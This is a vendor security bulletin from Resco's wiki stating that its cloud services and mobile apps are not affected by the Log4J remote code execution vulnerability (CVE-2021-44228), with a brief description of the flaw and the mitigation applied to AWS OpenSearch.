Security bulletin

From Resco's Wiki
Jump to navigation Jump to search
Releases
Preview release

Production releases

This page shows Resco's analyses of publicly disclosed vulnerabilities with potential impact on Resco products and services.

CVE-2021-44228 (Log4J vulnerable to remote code execution)

Security issue Log4J vulnerable to remote code execution
Date December 14, 2021
Affected platforms None
Severity Low

This page answers frequently asked questions related to the vulnerability CVE-2021-44228 (Log4J vulnerable to remote code execution).

Resco’s cloud services and mobile applications are NOT vulnerable.

While analyzing the situation, we applied the guidelines posted by NCC Group and the mitigation guidance for Microsoft services.

We will continue monitoring the situation and keep this page updated should we come to newer conclusions.

Vulnerability

A zero-day exploit in Log4J was discovered on 9 December 2021. The exploit results in remote code execution by logging a specific string. An attacker can gain full server access by exploiting the Log4J vulnerability.

For more information, we recommend Microsoft’s Security Response Center.

If you are interested in reproducing the vulnerability, you can visit christophetd’s sample code (run at your own risk in a local sandbox environment).

Impact on Resco Cloud products

Resco Cloud products are NOT vulnerable.

Our Resco Cloud security team has analyzed all our cloud services. Resco Cloud does not use any vulnerable versions of Log4J and to our best knowledge, Resco Cloud was exposed to this exploit at no time. We will continue our analysis and update this information if needed.

As some instances of Resco Cloud run on Amazon AWS, the AWS Open Search was impacted. We use Open Search for monitoring Resco Cloud services. We have updated the libraries according to Amazon’s advice and have mitigated the vulnerability. However, it is important to understand that even a compromised Open Search does not provide access to Resco Cloud services.

Impact on Resco Mobile Apps

Resco mobile apps available from Apple, Microsoft, and Google App Stores are NOT vulnerable to the Log4J vulnerability.